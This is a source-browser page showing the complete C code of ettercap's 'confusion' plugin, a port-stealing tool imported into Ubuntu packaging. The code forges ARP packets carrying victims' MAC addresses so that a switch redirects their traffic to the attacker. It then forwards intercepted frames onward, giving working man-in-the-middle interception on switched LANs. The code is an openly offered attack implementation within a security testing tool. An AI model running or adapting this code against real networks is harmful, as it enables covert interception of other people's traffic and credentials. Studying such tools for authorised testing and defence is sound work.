← Back to branch summary

~ubuntu-branches/ubuntu/precise/ettercap/precise

« back to all changes in this revision

Viewing changes to plugins/confusion/confusion.c

  • Committer: Bazaar Package Importer
  • Author(s): Murat Demirten
  • Date: 2003-06-21 19:57:18 UTC
  • Revision ID: james.westby@ubuntu.com-20030621195718-qqbbfk18e1djchd9
Tags: upstream-0.6.b
ImportĀ upstreamĀ versionĀ 0.6.b

Show diffs side-by-side

added added

removed removed

Lines of Context:
plugins/confusion/confusion.c
 
1
/*
 
2
    confusion -- ettercap plugin -- Port Stealer
 
3
 
 
4
    Copyright (C) 2003  ALoR <alor@users.sourceforge.net>, NaGA <crwm@freemail.it>
 
5
 
 
6
    This program is free software; you can redistribute it and/or modify
 
7
    it under the terms of the GNU General Public License as published by
 
8
    the Free Software Foundation; either version 2 of the License, or
 
9
    (at your option) any later version.
 
10
 
 
11
    This program is distributed in the hope that it will be useful,
 
12
    but WITHOUT ANY WARRANTY; without even the implied warranty of
 
13
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 
14
    GNU General Public License for more details.
 
15
 
 
16
    You should have received a copy of the GNU General Public License
 
17
    along with this program; if not, write to the Free Software
 
18
    Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 
19
 
 
20
*/
 
21
 
 
22
#ifdef CYGWIN
 
23
   #include <windows.h>
 
24
   #include <winsock2.h> 
 
25
#else
 
26
//   #include <sys/time.h>
 
27
//   #include <unistd.h>
 
28
#endif
 
29
 
 
30
//#include <stdlib.h>
 
31
 
 
32
#include "../../src/include/ec_main.h"
 
33
#include "../../src/include/ec_version.h"
 
34
#include "../../src/include/ec_plugins.h"
 
35
#include "../../src/include/ec_inet_structures.h"
 
36
#include "../../src/include/ec_inet.h"
 
37
#include "../../src/include/ec_inet_forge.h"
 
38
 
 
39
// protos...
 
40
 
 
41
int Plugin_Init(void *);
 
42
int Plugin_Fini(void *);
 
43
int In_List(char *mac);
 
44
int confusion(void *dummy);
 
45
 
 
46
// plugin operation
 
47
 
 
48
struct plugin_ops confusion_ops = {
 
49
   ettercap_version: VERSION,
 
50
   plug_info:        "Port Stealing",
 
51
   plug_version:     12,
 
52
   plug_type:        PT_EXT,
 
53
   hook_point:       HOOK_NONE,
 
54
   hook_function:    &confusion,
 
55
};
 
56
 
 
57
char FakeMAC[6] = {0x00, 0xfe, 0x00, 0x00, 0x00, 0x00};
 
58
char BroadMAC[6]= {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
 
59
char ArpMAC[6]  = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00};
 
60
 
 
61
//==================================
 
62
 
 
63
int Plugin_Init(void *params)
 
64
{
 
65
   return Plugin_Register(params, &confusion_ops);
 
66
}
 
67
 
 
68
int Plugin_Fini(void *params)
 
69
{
 
70
   return 0;
 
71
}
 
72
 
 
73
// =================================
 
74
 
 
75
 
 
76
int In_List(char *mac)
 
77
{
 
78
    char TempMAC[6];
 
79
    int i;
 
80
    
 
81
    if (!memcmp(mac, BroadMAC, 6)) return -1;
 
82
    for (i=1; i< number_of_hosts_in_lan; i++)
 
83
    {
 
84
        Inet_GetMACfromString(Host_In_LAN[i].mac, TempMAC);
 
85
        if (!memcmp(TempMAC, mac, 6)) return (i);
 
86
    }
 
87
    return -1;
 
88
}
 
89
 
 
90
int confusion(void *dummy)
 
91
{
 
92
   int sock, i=0, j, len, MTU, to_sleep=1;
 
93
   struct recv_packet pck, s_pck;
 
94
   u_long FakeIP=0x45454545, MyIP;
 
95
   char MyMAC[6], SourceMAC[6], c[1]="";
 
96
   ETH_header *eth, *rec_eth;
 
97
   ARP_header *arp;
 
98
 
 
99
   if (number_of_hosts_in_lan < 2)
 
100
   {
 
101
       Plugin_Output("\nYou have to build Host-List to use confusion\n");
 
102
       return 0;
 
103
   }
 
104
   
 
105
   Plugin_Output("\nUse this plugin only on switched networks\nBe sure to keep the NIC in promisc mode\nPress return to stop\n");
 
106
 
 
107
   sock = Inet_OpenRawSock(Options.netiface);
 
108
   Inet_GetIfaceInfo(Options.netiface, &MTU, MyMAC, &MyIP, NULL);
 
109
 
 
110
   Inet_SetPromisc(Options.netiface);
 
111
   
 
112
   pck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
 
113
   pck.aligned = pck.buf + ALIGN_ETH_TO_WORD;
 
114
 
 
115
   s_pck.buf = Inet_Forge_packet( MTU + ALIGN_ETH_TO_WORD);
 
116
   s_pck.aligned = s_pck.buf + ALIGN_ETH_TO_WORD;
 
117
 
 
118
   Inet_SetNonBlock(sock);
 
119
 
 
120
   LOOP
 
121
   {
 
122
        Inet_GetMACfromString(Host_In_LAN[i+1].mac, SourceMAC);
 
123
        Inet_Forge_ethernet(s_pck.aligned, SourceMAC, MyMAC, ETH_P_ARP);
 
124
        Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REPLY, SourceMAC, FakeIP, FakeMAC, FakeIP );
 
125
 
 
126
        i++;
 
127
        i%=(number_of_hosts_in_lan - 1);
 
128
        
 
129
        Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
 
130
        
 
131
        
 
132
        if (Plugin_Input(c, 1, P_NONBLOCK))
 
133
        {
 
134
            for (i=1; i<number_of_hosts_in_lan; i++)
 
135
            {
 
136
                usleep(Options.storm_delay);
 
137
                Inet_GetMACfromString(Host_In_LAN[i].mac, SourceMAC);
 
138
                Inet_Forge_ethernet(s_pck.aligned, MyMAC, SourceMAC, ETH_P_ARP);
 
139
                Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REQUEST, MyMAC, MyIP, ArpMAC, inet_addr(Host_In_LAN[i].ip));
 
140
                Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
 
141
            }    
 
142
        
 
143
            Inet_Restore_ifr();
 
144
            Inet_Forge_packet_destroy( pck.buf );
 
145
            Inet_Forge_packet_destroy( s_pck.buf );
 
146
            Inet_CloseRawSock(sock);
 
147
            return 0;
 
148
        }
 
149
        
 
150
        len = Inet_GetRawPacket(sock, pck.aligned, MTU, NULL);
 
151
 
 
152
        if (to_sleep) usleep(Options.storm_delay);
 
153
 
 
154
        to_sleep=1;
 
155
        if (len>0)
 
156
        {
 
157
            eth = (ETH_header *) pck.aligned;
 
158
 
 
159
            if ((j=In_List(eth->dest_mac)) > 0)
 
160
            {
 
161
                int s_sock;
 
162
                s_sock = Inet_OpenRawSock(Options.netiface);
 
163
                
 
164
                Inet_Forge_ethernet(s_pck.aligned, MyMAC, BroadMAC, ETH_P_ARP);
 
165
                Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REQUEST, MyMAC, MyIP, ArpMAC, inet_addr(Host_In_LAN[j].ip));
 
166
                Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
 
167
                
 
168
                if (In_List(eth->source_mac)==-1)
 
169
                    memcpy(eth->source_mac, MyMAC, 6);
 
170
                
 
171
                do
 
172
                {
 
173
                   if (Inet_GetRawPacket(s_sock, s_pck.aligned, MTU, NULL)<=0) continue;
 
174
                   rec_eth = (ETH_header *) s_pck.aligned;
 
175
                } while (memcmp(rec_eth->source_mac, eth->dest_mac, 6) || memcmp(rec_eth->dest_mac, MyMAC, 6) || rec_eth->type != htons(ETH_P_ARP)); 
 
176
                
 
177
                Inet_SendRawPacket(sock, pck.aligned, len);
 
178
                
 
179
                Inet_CloseRawSock(s_sock);
 
180
 
 
181
                Inet_Forge_ethernet(s_pck.aligned, eth->dest_mac, MyMAC, ETH_P_ARP);
 
182
                Inet_Forge_arp( s_pck.aligned + ETH_HEADER, ARPOP_REPLY, eth->dest_mac, FakeIP, FakeMAC, FakeIP );
 
183
                Inet_SendRawPacket(sock, s_pck.aligned, ETH_HEADER + ARP_HEADER);
 
184
                to_sleep=0;
 
185
            }
 
186
        }
 
187
   }
 
188
}
 
189
 
 
190
/* EOF */